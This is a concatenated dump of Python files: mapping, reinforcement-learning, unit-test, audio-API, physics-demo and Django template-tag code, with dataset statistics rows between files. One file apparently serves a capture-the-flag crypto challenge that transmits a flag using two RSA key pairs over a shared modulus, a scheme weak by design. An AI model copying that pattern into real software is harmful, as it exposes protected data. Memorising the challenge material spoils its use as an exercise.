m = folium.Map(location=map_center, control_scale=True, zoom_start=9)
stations.apply(lambda row: folium.CircleMarker(
location=[row.lat, row.lon],
radius=7,
fill_color=f'{row.color}',
color=f'{row.color}',
popup=folium.Popup(f'<p><b>STATION</b></br>id <b>{row.id}</b></br>serial <b>{row.serial}</b></br>source <b>{row.source}</b></p>', show=False, sticky=True),
).add_to(m), axis=1)
stations[ stations.source != 'none' ].apply(lambda row: folium.PolyLine(
locations=[
[ sources.loc[row.source, 'lat'], sources.loc[row.source, 'lon'] ],
[ row.lat, row.lon ]
],
color='black',
weight=2,
).add_to(m), axis=1)
sources.apply(lambda row: folium.CircleMarker(
location=[row.lat, row.lon],
radius=10,
fill_color=f'{row.color}',
color=f'{row.color}',
fill_opacity=1.0,
popup=folium.Popup(f'<p><b>SOURCE</b></br>id <b>{row.name}</b></p>', show=True, sticky=True),
).add_to(m), axis=1)
s, w = stations.loc[ stations.lon > 0, ['lat', 'lon']].min()
n, e = stations.loc[ stations.lon > 0, ['lat', 'lon']].max()
m.fit_bounds([ [s,w], [n,e] ])
m.save(f'map_sniffer2sources.html')
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-c', '--cfg', help='config file', required=True)
args = parser.parse_args()
base = args.cfg
base = base[:base.rfind('.')]
with open(args.cfg) as f:
config = json.load(f)
mdu = model_dubrovnik(config)
if 0:
df = mdu.get_station_metadata()
dfj = json.loads(df.to_json(orient="records"))
with open('stations_geodata.json', 'w') as sout:
json.dump(dfj, sout, indent=2, ensure_ascii=False)
print(df)
map_center = df[['lat', 'lon']].mean().values
import folium
m = folium.Map(location=map_center, control_scale=True, zoom_start=9)
df.apply(lambda row: folium.CircleMarker(
location=[row.lat, row.lon],
radius=7,
fill_color='red',
color='red',
popup=folium.Popup(f'<p><b>SNIFFER</b></br>id <b>{row.id}</b></br>serial <b>{row.serial}</b></p>', show=False, sticky=True),
).add_to(m), axis=1)
s, w = df[['lat', 'lon']].min()
n, e = df[['lat', 'lon']].max()
m.fit_bounds([ [s,w], [n,e] ])
m.save(f'map_router.html')
start_date = '2021-01-22 00:00:00 CET'
stop_date = '2021-01-23 00:00:00 CET'
dt_fmt = '%Y-%m-%d %H:%M:%S %Z'
start = pd.to_datetime(start_date, format=dt_fmt).tz_localize(None)
stop = pd.to_datetime(stop_date, format=dt_fmt).tz_localize(None)
if 0:
data = mdu.get_data(start, stop)
print(data)
if 0:
cnt = mdu.count_raw(start, stop)
print(cnt)
if 0:
df = mdu.full_table(start, stop)
print(df)
w, h = 12, 10
fig, ax = plt.subplots(1, 1, figsize=(w, h))
plt.suptitle(f'Source timetables')
for cid in df.columns:
ax.plot(df.index, df[cid], '-', label=cid)
ax.set_title(f'period {start} -> {stop}')
ax.legend()
ax.grid()
ax.tick_params(labelrotation=45)
plt.savefig(f'source_timetables.png')
plt.close()
if 1:
mdu.map_station_to_source() | 32.938416 | 161 | 0.611289 | 1,568 | 11,232 | 4.271046 | 0.213648 | 0.018068 | 0.012543 | 0.011946 | 0.315962 | 0.270718 | 0.260415 | 0.208302 | 0.197253 | 0.185307 | 0 | 0.01008 | 0.213942 | 11,232 | 341 | 162 | 32.938416 | 0.748443 | 0.062055 | 0 | 0.266917 | 0 | 0.011278 | 0.178733 | 0.034513 | 0 | 0 | 0 | 0 | 0 | 1 | 0.022556 | false | 0.007519 | 0.052632 | 0 | 0.093985 | 0.026316 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8d3de2cf6adf1448807a47eac86afeaf485db42 | 2,577 | py | Python | manipulation_main/utils.py | ama29/6.843-Final-Project | cc0628f32cd695e0a76ffb0b7daa8c7350b6f0ed | [
"MIT"
] | 75 | 2020-10-24T06:32:55.000Z | 2022-03-26T07:44:49.000Z | manipulation_main/utils.py | ama29/6.843-Final-Project | cc0628f32cd695e0a76ffb0b7daa8c7350b6f0ed | [
"MIT"
] | 12 | 2021-03-21T06:19:00.000Z | 2022-03-31T13:39:34.000Z | manipulation_main/utils.py | ama29/6.843-Final-Project | cc0628f32cd695e0a76ffb0b7daa8c7350b6f0ed | [
"MIT"
] | 27 | 2020-12-30T12:49:46.000Z | 2022-03-17T16:10:02.000Z | import logging
import time
import numpy as np
from manipulation_main.gripperEnv.robot import RobotEnv
def run_agent(task, agent, stochastic=False, n_episodes=100, debug=False):
rewards = np.zeros(n_episodes)
steps = np.zeros(n_episodes)
success_rates = np.zeros(n_episodes)
timings = np.zeros(n_episodes)
# Vectorized env only needs reset in the beginning then it resets automatically
obs = task.reset()
for i in range(n_episodes):
# Run and time one rollout
start = time.process_time()
s, r, sr = _run_episode(obs, task, agent, stochastic) if not debug else _run_episode_debug(task, agent, stochastic)
end = time.process_time()
# Store the statistics
rewards[i] = np.sum(r)
steps[i] = s
success_rates[i] = sr
timings[i] = end - start
logging.info('Episode %d/%d completed in %ds, %d steps and return %f\n and success rate %d',
i+1, n_episodes, timings[i], steps[i], rewards[i], success_rates[i])
mean_reward = np.mean(rewards)
mean_steps = np.mean(steps)
mean_success_rate = np.mean(success_rates)
mean_time = np.mean(timings)
# Print the statistics
print('{:<13}{:>5.2f}'.format('Mean reward:', mean_reward))
print('{:<13}{:>5.2f}'.format('Mean steps:', mean_steps))
print('{:<13}{:>5.2f}'.format('Mean success rate:', mean_success_rate))
print('{:<13}{:>5.2f}'.format('Mean time:', mean_time))
return rewards, steps, success_rates, timings
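# A minimal usage sketch (environment and agent construction are project-specific
# and shown only as assumptions):
#     task = ...   # a vectorized RobotEnv-compatible environment
#     agent = ...  # e.g. a policy object exposing .predict()
#     rewards, steps, success_rates, timings = run_agent(task, agent, n_episodes=10)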
def _run_episode_debug(task, agent, stochastic):
obs = task.reset()
done = False
while not done:
# logging.debug('Observation: %s', obs)
action = agent.act(obs, stochastic=stochastic)
obs, reward, done, _ = task.step(action)
position, _ = task.get_pose()
robot_height = position[2]
# logging.debug('Action: %s', action)
# logging.debug('Reward: %s\n', reward)
return task.episode_step, task.episode_rewards, task.status == task.Status.SUCCESS
def _run_episode(obs, task, agent, stochastic):
done = False
deterministic = not stochastic
while not done:
# logging.debug('Observation: %s', obs)
action = agent.predict(obs, deterministic=deterministic)
obs, reward, done, _ = task.step(action[0])
# logging.debug('Action: %s', action)
# logging.debug('Reward: %s\n', reward)
return task.buf_infos[0]["episode_step"], task.buf_infos[0]["episode_rewards"], task.buf_infos[0]["status"] == RobotEnv.Status.SUCCESS | 33.907895 | 138 | 0.642996 | 348 | 2,577 | 4.623563 | 0.264368 | 0.039155 | 0.059043 | 0.039776 | 0.325668 | 0.303294 | 0.137974 | 0.137974 | 0.137974 | 0.137974 | 0 | 0.01245 | 0.220799 | 2,577 | 76 | 138 | 33.907895 | 0.788845 | 0.142802 | 0 | 0.133333 | 0 | 0.022222 | 0.098226 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.088889 | 0 | 0.222222 | 0.088889 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8d8853a7864dcc977309abcfdfe79184c98511f | 771 | py | Python | tests/test_ecbl.py | badkeys/badkeys | c8cbc244f645cfcc54244fa4ea7722cd3f39ce22 | [
"MIT"
] | 9 | 2022-01-14T03:32:34.000Z | 2022-03-22T13:47:45.000Z | tests/test_ecbl.py | badkeys/badkeys | c8cbc244f645cfcc54244fa4ea7722cd3f39ce22 | [
"MIT"
] | null | null | null | tests/test_ecbl.py | badkeys/badkeys | c8cbc244f645cfcc54244fa4ea7722cd3f39ce22 | [
"MIT"
] | 1 | 2022-03-14T11:36:15.000Z | 2022-03-14T11:36:15.000Z | import unittest
import os
import badkeys
TDPATH = f"{os.path.dirname(__file__)}/data/"
class TestEcbl(unittest.TestCase):
def test_ecbl(self):
with open(f"{TDPATH}ec-p256-rfc-example.key") as f:
key = f.read()
r = badkeys.checkpubkey(key, checks=["blocklist"])
self.assertTrue("blocklist" in r["results"])
with open(f"{TDPATH}ed25519-rfc-example.key") as f:
key = f.read()
r = badkeys.checkpubkey(key, checks=["blocklist"])
self.assertTrue("blocklist" in r["results"])
with open(f"{TDPATH}x448-ok.key") as f:
key = f.read()
r = badkeys.checkpubkey(key, checks=["blocklist"])
self.assertFalse(r["results"])
if __name__ == "__main__":
unittest.main()
| 28.555556 | 59 | 0.607004 | 99 | 771 | 4.59596 | 0.40404 | 0.052747 | 0.059341 | 0.098901 | 0.6 | 0.6 | 0.6 | 0.6 | 0.6 | 0.6 | 0 | 0.018613 | 0.233463 | 771 | 26 | 60 | 29.653846 | 0.751269 | 0 | 0 | 0.4 | 0 | 0 | 0.243839 | 0.123217 | 0 | 0 | 0 | 0 | 0.15 | 1 | 0.05 | false | 0 | 0.15 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8d89457739e1aae271292671fe5745bb6d4974c | 1,266 | py | Python | tests/test_itertools.py | star936/python-learning | 02fe35a3944cb75184f1c9196618202ccf02c210 | [
"MIT"
] | null | null | null | tests/test_itertools.py | star936/python-learning | 02fe35a3944cb75184f1c9196618202ccf02c210 | [
"MIT"
] | 2 | 2021-12-13T20:11:09.000Z | 2022-03-02T15:12:36.000Z | tests/test_itertools.py | star936/python-learning | 02fe35a3944cb75184f1c9196618202ccf02c210 | [
"MIT"
] | null | null | null | # coding: utf-8
from examples.itertools import grouper, group_bills_to_100, evens, odds, chain_repeat_slice
class TestIterTools(object):
def test_groper(self):
num = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
real = grouper(num, 4, fillvalue=None)
expected = [(1, 2, 3, 4), (5, 6, 7, 8), (9, 10, None, None)]
assert list(real) == expected
def test_group_bills_to_100(self):
expected = {(20, 20, 10, 10, 10, 10, 10, 5, 1, 1, 1, 1, 1),
(20, 20, 10, 10, 10, 10, 10, 5, 5),
(20, 20, 20, 10, 10, 10, 5, 1, 1, 1, 1, 1),
(20, 20, 20, 10, 10, 10, 5, 5),
(20, 20, 20, 10, 10, 10, 10)}
real = group_bills_to_100()
assert set(real) == expected
def test_even(self):
expected = [0, 2, 4, 6, 8]
data = evens()
real = [next(data) for _ in range(5)]
assert real == expected
def test_odd(self):
expected = [1, 3, 5, 7, 9]
data = odds()
real = [next(data) for _ in range(5)]
assert real == expected
def test_chain_repeat_slice(self):
expected = ['a', 'b', 'c', 'a', 'b', 'c', 'a', 'b']
real = chain_repeat_slice()
assert list(real) == expected
| 33.315789 | 91 | 0.5 | 191 | 1,266 | 3.198953 | 0.277487 | 0.0982 | 0.0982 | 0.065466 | 0.340426 | 0.327332 | 0.324059 | 0.320786 | 0.301146 | 0.301146 | 0 | 0.15119 | 0.336493 | 1,266 | 37 | 92 | 34.216216 | 0.57619 | 0.010269 | 0 | 0.206897 | 0 | 0 | 0.006395 | 0 | 0 | 0 | 0 | 0 | 0.172414 | 1 | 0.172414 | false | 0 | 0.034483 | 0 | 0.241379 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
2cd19aead162f8c831f9edd1ff31b6b49e40ea79 | 3,860 | py | Python | utils.py | dolbyio-samples/blog-enhance-parameters-audio-quality | fd5764d7d1bb58b641eb607399d5b3f069bf365c | [
"CC0-1.0"
] | null | null | null | utils.py | dolbyio-samples/blog-enhance-parameters-audio-quality | fd5764d7d1bb58b641eb607399d5b3f069bf365c | [
"CC0-1.0"
] | null | null | null | utils.py | dolbyio-samples/blog-enhance-parameters-audio-quality | fd5764d7d1bb58b641eb607399d5b3f069bf365c | [
"CC0-1.0"
] | null | null | null | import time
import requests
import shutil
import os
import numpy as np
import matplotlib.pyplot as plt
import scipy.io.wavfile as wavfile
def download_file(file_url, headers, output_path):
args = {
"url": file_url,
}
url = "https://api.dolby.com/media/output"
# Create a request to download created file via DolbyIO Output API
with requests.get(url, params=args, headers=headers, stream=True) as response:
response.raise_for_status()
response.raw.decode_content = True
print("Downloading from {0} into {1}".format(response.url, output_path))
with open(output_path, "wb") as output_file:
shutil.copyfileobj(response.raw, output_file)
return output_path
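# Note: every helper below assumes `headers` already carries your Dolby.io
# credentials (e.g. an API-key or bearer-token header -- the exact scheme
# depends on your account setup; illustrative, not verified here).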
def upload_input_file(local_file_path, input_base_path, headers):
filename = os.path.basename(local_file_path)
cloud_file_path = '{}/{}'.format(input_base_path, filename)
arguments = {
"url": cloud_file_path,
}
url = "https://api.dolby.com/media/input"
# Create a request to upload a file from local machine via DolbyIO Input API
response = requests.post(url, json=arguments, headers=headers)
response.raise_for_status()
data = response.json()
presigned_url = data["url"]
# Upload your media to the pre-signed url response
print("Uploading {0} to {1}".format(local_file_path, presigned_url))
with open(local_file_path, "rb") as input_file:
requests.put(presigned_url, data=input_file)
return cloud_file_path
def convert_mp4_to_wav(mp4_file):
# To use this function, you need to have ffmpeg installed on your computer
    # replace only the extension; a plain str.replace('mp4', 'wav') would also
    # rewrite any 'mp4' appearing elsewhere in the path
    wave_file = os.path.splitext(mp4_file)[0] + '.wav'
os.system('ffmpeg -i {} -ac 1 -f wav {}'.format(mp4_file, wave_file))
return wave_file
def plot_a_waveform_and_spectrum(wave_file, title=None):
# Create a figure object to make two plots
fig = plt.figure(1)
if title:
fig.suptitle(title)
# Plot a waveform of wav_file
plot_waveform = plt.subplot(211)
sample_rate, data = wavfile.read(wave_file)
duration = len(data) / sample_rate
time_data = np.linspace(0, duration, len(data))
plot_waveform.plot(time_data, data)
plot_waveform.set_xlabel('Time')
plot_waveform.set_ylabel('Amplitude')
ax = plt.gca()
ax.set_xlim([0, 5])
    # Calculate and create a spectrogram plot
plot_spectrogram = plt.subplot(212)
plot_spectrogram.specgram(data[:], Fs=sample_rate, NFFT=1024, noverlap=900)
plot_spectrogram.set_xlabel('Time')
plot_spectrogram.set_ylabel('Frequency')
ax = plt.gca()
ax.set_xlim([0, 5])
fig.tight_layout()
plt.savefig('{}.png'.format(wave_file))
plt.close()
def enhance_media(input_url, output, params, headers):
    # Set Enhance API URL
    url = "https://api.dolby.com/media/enhance"
    body = {
        "input": input_url,
        "output": output
    }
    body.update(params)
    response = requests.request("POST", url, json=body, headers=headers)
    print('{} processed to: {}'.format(input_url, output))
print(response.text)
return output
def enhance_download_analyze(input_file, output_filename, output_file_base, output_local_file_base, enhance_params,
headers, title=None):
output_cloud_storage = '{}/{}'.format(output_file_base, output_filename)
output_local = '{}/{}'.format(output_local_file_base, output_filename)
# Enhance
enhance_media(input_file, output_cloud_storage, enhance_params, headers)
# Download produced file to your local machine
time.sleep(10)
downloaded_file = download_file(output_cloud_storage, headers, output_local)
print('Downloaded file: {}'.format(downloaded_file))
# utils.plot_a_waveform(downloaded_file)
wav_file = convert_mp4_to_wav(downloaded_file)
plot_a_waveform_and_spectrum(wav_file, title) | 32.166667 | 115 | 0.698187 | 532 | 3,860 | 4.838346 | 0.291353 | 0.021756 | 0.020202 | 0.018648 | 0.063714 | 0.045066 | 0.035742 | 0.014763 | 0 | 0 | 0 | 0.01027 | 0.192746 | 3,860 | 120 | 116 | 32.166667 | 0.815789 | 0.124611 | 0 | 0.074074 | 0 | 0 | 0.08848 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.074074 | false | 0 | 0.08642 | 0 | 0.209877 | 0.061728 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
2cd56853a7874d3f69f6d5cadacbd3f01499519b | 1,118 | py | Python | src/julia/tests/test_sysimage.py | grahamgill/pyjulia | 15504cddfefb477048aa09c17e9ed6fde65ca037 | [
"MIT"
] | null | null | null | src/julia/tests/test_sysimage.py | grahamgill/pyjulia | 15504cddfefb477048aa09c17e9ed6fde65ca037 | [
"MIT"
] | null | null | null | src/julia/tests/test_sysimage.py | grahamgill/pyjulia | 15504cddfefb477048aa09c17e9ed6fde65ca037 | [
"MIT"
] | null | null | null | import pytest
from julia.sysimage import build_sysimage
from .test_compatible_exe import runcode
from .utils import only_in_ci, skip_in_appveyor
@pytest.mark.julia
@only_in_ci
@skip_in_appveyor  # Avoid "LLVM ERROR: out of memory"
def test_build_and_load(tmpdir, juliainfo):
if juliainfo.version_info < (1, 3, 1):
pytest.skip("Julia < 1.3.1 is not supported")
sysimage_path = str(tmpdir.join("sys.so"))
build_sysimage(sysimage_path, julia=juliainfo.julia)
very_random_string = "4903dc03-950f-4a54-98a3-c57a354b62df"
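    # unique marker: seeing it echoed on stdout proves the sysimage-backed
    # Julia subprocess below really executed our code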
proc = runcode(
"""
from julia.api import Julia
sysimage_path = {sysimage_path!r}
very_random_string = {very_random_string!r}
jl = Julia(
debug=True,
sysimage=sysimage_path,
runtime={juliainfo.julia!r},
)
from julia import Main
Main.println(very_random_string)
""".format(
juliainfo=juliainfo,
sysimage_path=sysimage_path,
very_random_string=very_random_string,
)
)
assert very_random_string in proc.stdout
| 27.268293 | 63 | 0.661896 | 142 | 1,118 | 4.950704 | 0.429577 | 0.119488 | 0.159317 | 0.034139 | 0.153627 | 0.153627 | 0 | 0 | 0 | 0 | 0 | 0.033453 | 0.251342 | 1,118 | 40 | 64 | 27.95 | 0.806452 | 0.028623 | 0 | 0 | 0 | 0 | 0.098093 | 0.049046 | 0 | 0 | 0 | 0 | 0.047619 | 1 | 0.047619 | false | 0 | 0.190476 | 0 | 0.238095 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
2cd5f072b64decf0deefb73f0c810cfa919e68d4 | 1,717 | py | Python | tasks/crypto/warmer/service/warmer.py | keltecc/ctfcup-2020-quals | a8d3702b3449c4e459e80aea781bed85175fee02 | [
"MIT"
] | null | null | null | tasks/crypto/warmer/service/warmer.py | keltecc/ctfcup-2020-quals | a8d3702b3449c4e459e80aea781bed85175fee02 | [
"MIT"
] | null | null | null | tasks/crypto/warmer/service/warmer.py | keltecc/ctfcup-2020-quals | a8d3702b3449c4e459e80aea781bed85175fee02 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3.7
from gmpy2 import next_prime, gcdext
from random import getrandbits
class Cryptoanalyst:
def __init__(self, p, q):
self._n = p * q
self._phi = (p - 1) * (q - 1)
self._e, self._d = self.generate_key()
return
def generate_key(self):
bits = self._n.bit_length()
while True:
e = getrandbits(bits) % self._phi
g, d, _ = gcdext(e, self._phi)
if g == 1 and d.bit_length() == e.bit_length():
break
return e, d
def encrypt(self, plaintext):
return pow(plaintext, self._e, self._n)
def decrypt(self, ciphertext):
return pow(ciphertext, self._d, self._n)
def get_key(self):
return (self._n, self._e)
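# Note: d is (up to sign) a modular inverse of e mod phi(n), so encryption and
# decryption undo each other for messages coprime to n -- which is exactly
# what secure_transmission() asserts below.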
def secure_transmission(sender, receiver, secret):
    print('> sender: hello')
    print('> receiver: hello')
print(f'> sender: {sender.get_key()}')
print(f'> receiver: {receiver.get_key()}')
message1 = sender.encrypt(secret)
print(f'> sender: {message1}')
message2 = receiver.encrypt(message1)
print(f'> receiver: {message2}')
message3 = sender.decrypt(message2)
print(f'> sender: {message3}')
message4 = receiver.decrypt(message3)
assert message4 == secret
return
def main():
bits = 1024
p, q = map(int, map(next_prime, map(getrandbits, [bits] * 2)))
sender = Cryptoanalyst(p, q)
receiver = Cryptoanalyst(p, q)
with open('flag.txt', 'r') as file:
flag = file.read().strip()
message = int.from_bytes(flag.encode(), 'big')
secure_transmission(sender, receiver, message)
return
if __name__ == '__main__':
main()
| 22.893333 | 66 | 0.589983 | 216 | 1,717 | 4.509259 | 0.347222 | 0.043121 | 0.049281 | 0.065708 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0176 | 0.271986 | 1,717 | 74 | 67 | 23.202703 | 0.7616 | 0.013395 | 0 | 0.0625 | 0 | 0 | 0.102776 | 0 | 0 | 0 | 0 | 0 | 0.020833 | 1 | 0.145833 | false | 0 | 0.041667 | 0.0625 | 0.354167 | 0.145833 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
2cdc2b87699ba37eac9144773d8c0c6af7b08a1a | 6,302 | py | Python | demos/backtrack_sys_id.py | kracon7/lcp-physics | 463d9602350b854464a027b2c57faae412fa2691 | [
"Apache-2.0"
] | 1 | 2022-01-25T09:13:10.000Z | 2022-01-25T09:13:10.000Z | demos/backtrack_sys_id.py | kracon7/lcp-physics | 463d9602350b854464a027b2c57faae412fa2691 | [
"Apache-2.0"
] | null | null | null | demos/backtrack_sys_id.py | kracon7/lcp-physics | 463d9602350b854464a027b2c57faae412fa2691 | [
"Apache-2.0"
] | null | null | null | import os
import sys
import time
import math
from math import sin, cos
import cv2
import pygame
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1 import make_axes_locatable
import torch
from torch.autograd import Variable
from lcp_physics.physics.bodies import Circle, Rect, Hull, Composite
from lcp_physics.physics.constraints import TotalConstraint, FixedJoint
from lcp_physics.physics.forces import ExternalForce, Gravity, vert_impulse, hor_impulse
from lcp_physics.physics.utils import Defaults, plot, reset_screen, Recorder
from lcp_physics.physics.world import World, run_world
from lcp_physics.physics.action import build_mesh, random_action
from lcp_physics.physics.sim import SimSingle
TIME = 2
DT = Defaults.DT
DEVICE = Defaults.DEVICE
ROOT = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
np.random.seed(10)
torch.random.manual_seed(0)
def plot_mass_error(mask, m1, m2, save_path=None):
err = np.zeros_like(mask).astype('float')
err[mask] = m1 - m2
ax = plt.subplot()
im = ax.imshow(err, vmin=-0.15, vmax=0.15, cmap='plasma')
# create an axes on the right side of ax. The width of cax will be 5%
# of ax and the padding between cax and ax will be fixed at 0.05 inch.
divider = make_axes_locatable(ax)
cax = divider.append_axes("right", size="5%", pad=0.05)
plt.colorbar(im, cax=cax)
if save_path:
plt.savefig(save_path)
plt.clf()
ax.cla()
def sys_id_demo(screen):
if screen is not None:
import pygame
background = pygame.Surface(screen.get_size())
background = background.convert()
background.fill((255, 255, 255))
obj_name = 'drill'
mass_img_path = os.path.join(ROOT, 'fig/%s_mass.png'%obj_name)
bottom_fric_img_path = os.path.join(ROOT, 'fig/%s_fric.png'%obj_name)
sim = SimSingle.from_img(mass_img_path, bottom_fric_img_path, particle_radius=10,
hand_radius=10)
sim.bottom_fric_est = sim.bottom_fric_gt
sim.action_mag = 20
sim.force_time = 0.3
# sim.mass_est = 0.09 * torch.ones(sim.N).to(DEVICE)
# sim.mass_est = Variable(sim.mass_est, requires_grad=True)
gt_mean = sim.mass_gt.mean()
sim.mass_est = 0.04 * torch.rand(sim.N) - 0.02 + gt_mean
sim.mass_est.requires_grad = True
max_iter = 20
dist_hist, new_dist_hist = [], []
mass_err_hist = []
last_dist = 1e10
for i in range(max_iter):
plot_mass_error(sim.mask, sim.mass_gt,
sim.mass_est.detach().numpy(), 'tmp/mass_err_%03d.png'%i)
################# Compute the gradient direction ###################
rotation, offset = torch.tensor([0]).type(Defaults.DTYPE), torch.tensor([[500, 300]]).type(Defaults.DTYPE)
composite_body_gt = sim.init_composite_object(
sim.particle_pos0,
sim.particle_radius,
sim.mass_gt,
sim.bottom_fric_gt,
rotation=rotation,
offset=offset)
action = sim.sample_action(composite_body_gt)
world = sim.make_world(composite_body_gt, action, verbose=-1)
recorder = None
# recorder = Recorder(DT, screen)
run_world(world, run_time=TIME, screen=screen, recorder=recorder)
X1 = composite_body_gt.get_particle_pos()
composite_body = sim.init_composite_object(
sim.particle_pos0,
sim.particle_radius,
sim.mass_est,
sim.bottom_fric_gt,
rotation=rotation,
offset=offset)
world = sim.make_world(composite_body, action, verbose=-1)
run_world(world, run_time=TIME, screen=screen, recorder=recorder)
X2 = composite_body.get_particle_pos()
dist = torch.sum(torch.norm(X1 - X2, dim=1))
dist.backward()
grad = torch.nan_to_num(sim.mass_est.grad.data)
print(grad)
################# Backtracking line search ###################
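        # Armijo sufficient-decrease test: accept the step only if the new
        # distance drops by at least alpha * 0.5 * ||grad||^2; otherwise
        # shrink alpha by rho (standard backtracking line search).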
cm = - 0.5 * torch.norm(grad)**2
alpha, rho = 0.01 / torch.abs(grad).max(), 0.6
count = 1
while True:
mass_est = torch.clamp(sim.mass_est.data - alpha * grad, min=1e-5)
composite_body = sim.init_composite_object(
sim.particle_pos0,
sim.particle_radius,
mass_est,
sim.bottom_fric_gt,
rotation=rotation,
offset=offset)
world = sim.make_world(composite_body, action, verbose=-1)
run_world(world, run_time=TIME, screen=screen, recorder=recorder)
X2 = composite_body.get_particle_pos()
new_dist = torch.sum(torch.norm(X1 - X2, dim=1))
if new_dist - dist > alpha * cm:
alpha *= rho
else:
break
if count >= 3:
break
count += 1
################# Update mass_est ###################
learning_rate = alpha
sim.mass_est = torch.clamp(sim.mass_est.data - learning_rate * grad, min=1e-5)
        sim.mass_est.requires_grad = True
        print(i, '/', max_iter, dist.data.item() / sim.N)
        print('=======\n\n')
        # .item(): matplotlib cannot plot tensors that still track gradients
        dist_hist.append(dist.item() / sim.N)
        new_dist_hist.append(new_dist.item() / sim.N)
reset_screen(screen)
fig, ax = plt.subplots(1, 1)
ax.plot(dist_hist, color='r')
ax.plot(new_dist_hist, color='b')
plt.show()
if __name__ == '__main__':
if len(sys.argv) > 1 and sys.argv[1] == '-nd':
# Run without displaying
screen = None
else:
pygame.init()
width, height = 1000, 600
screen = pygame.display.set_mode((width, height), pygame.DOUBLEBUF)
screen.set_alpha(None)
pygame.display.set_caption('2D Engine')
reset_screen(screen)
sys_id_demo(screen) | 36.218391 | 114 | 0.576642 | 803 | 6,302 | 4.313823 | 0.298879 | 0.030312 | 0.034642 | 0.042436 | 0.286663 | 0.265878 | 0.2347 | 0.2347 | 0.189954 | 0.17321 | 0 | 0.024318 | 0.308315 | 6,302 | 174 | 115 | 36.218391 | 0.77036 | 0.060457 | 0 | 0.253731 | 0 | 0 | 0.018598 | 0.003616 | 0 | 0 | 0 | 0 | 0 | 1 | 0.014925 | false | 0 | 0.149254 | 0 | 0.164179 | 0.022388 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
2cddba26a9f7ebff1e43f765570e7d69aa6a4da8 | 1,525 | py | Python | django_toolset/templatetags/custom_tags.py | codezeus/django-helpers | a28cc19e32cf41130e848c268d26c1858a7cf26a | [
"MIT"
] | null | null | null | django_toolset/templatetags/custom_tags.py | codezeus/django-helpers | a28cc19e32cf41130e848c268d26c1858a7cf26a | [
"MIT"
] | null | null | null | django_toolset/templatetags/custom_tags.py | codezeus/django-helpers | a28cc19e32cf41130e848c268d26c1858a7cf26a | [
"MIT"
] | null | null | null | import re
from django import template
from django.core.urlresolvers import reverse, NoReverseMatch
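# NOTE: django.core.urlresolvers was removed in Django 2.0; on newer versions
# the equivalent import lives at django.urls.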
register = template.Library()
@register.simple_tag(takes_context=True)
def active(context, pattern_or_urlname, class_name='active', *args, **kwargs):
"""Based on a URL Pattern or name, determine if it is the current page.
This is useful if you're creating a navigation component and want to give
the active URL a specific class for UI purposes. It will accept a named
URL or a regex pattern. If you have a URL which accepts args or kwargs then
you may pass them into the tag and they will be picked up for matching as
well.
Usage:
{% load custom_tags %}
<li class="nav-home {% active 'url-name' %}">
<a href="#">Home</a>
</li>
OR
<li class="nav-home {% active '^/regex/' %}">
<a href="#">Home</a>
</li>
OR
<li class="nav-home {% active 'url-name' class_name='current' %}">
<a href="#">Home</a>
</li>
OR
<li class="nav-home {% active 'url-name' username=user.username %}">
<a href="#">Home</a>
</li>
"""
request = context.dicts[1].get('request')
try:
pattern = '^%s$' % reverse(pattern_or_urlname, args=args,
kwargs=kwargs)
except NoReverseMatch:
pattern = pattern_or_urlname
if request and re.search(pattern, request.path):
return class_name
return ''
